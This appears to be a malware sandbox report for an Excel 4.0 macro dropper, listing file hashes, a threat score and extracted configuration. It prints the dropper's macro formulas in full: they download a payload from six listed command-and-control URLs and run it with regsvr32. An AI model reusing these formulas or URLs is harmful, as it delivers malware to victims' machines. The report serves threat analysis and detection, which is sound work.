General

  • Target

    519a5f41e3a1b8a715a693c49cf1c8fcd03b32b69da8e19490094ef6f9a3d445

  • Size

    48KB

  • Sample

    241120-wtqx2avqal

  • MD5

    892eb63724c7a6c28148de45341177a6

  • SHA1

    062862505350387be2160ae72105b2be9ffe1ee1

  • SHA256

    519a5f41e3a1b8a715a693c49cf1c8fcd03b32b69da8e19490094ef6f9a3d445

  • SHA512

    9e5be580a1c1c0bbb008cb156224b2ae2c5a4abe1adf3223b2c8bd1fe029747141d4dedbb4a132fdd2e6656b9da40609c8704604fdbe3abf6027282be2293629

  • SSDEEP

    768:o2uCkFF/vxRhR0KDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0BAR5:/uTlbMKDNck01u/R2rZyjB+5

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://henrysfreshroast.com/OevI7Yy0i6YShxFl/

http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/

http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/

https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/

http://1000paginas.com/tienda/vWtT/

http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/OevI7Yy0i6YShxFl/","..\si.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/","..\si.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/","..\si.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/","..\si.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://1000paginas.com/tienda/vWtT/","..\si.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/","..\si.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\si.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://henrysfreshroast.com/OevI7Yy0i6YShxFl/

Targets

    • Target

      519a5f41e3a1b8a715a693c49cf1c8fcd03b32b69da8e19490094ef6f9a3d445

    • Size

      48KB

    • MD5

      892eb63724c7a6c28148de45341177a6

    • SHA1

      062862505350387be2160ae72105b2be9ffe1ee1

    • SHA256

      519a5f41e3a1b8a715a693c49cf1c8fcd03b32b69da8e19490094ef6f9a3d445

    • SHA512

      9e5be580a1c1c0bbb008cb156224b2ae2c5a4abe1adf3223b2c8bd1fe029747141d4dedbb4a132fdd2e6656b9da40609c8704604fdbe3abf6027282be2293629

    • SSDEEP

      768:o2uCkFF/vxRhR0KDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0BAR5:/uTlbMKDNck01u/R2rZyjB+5

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks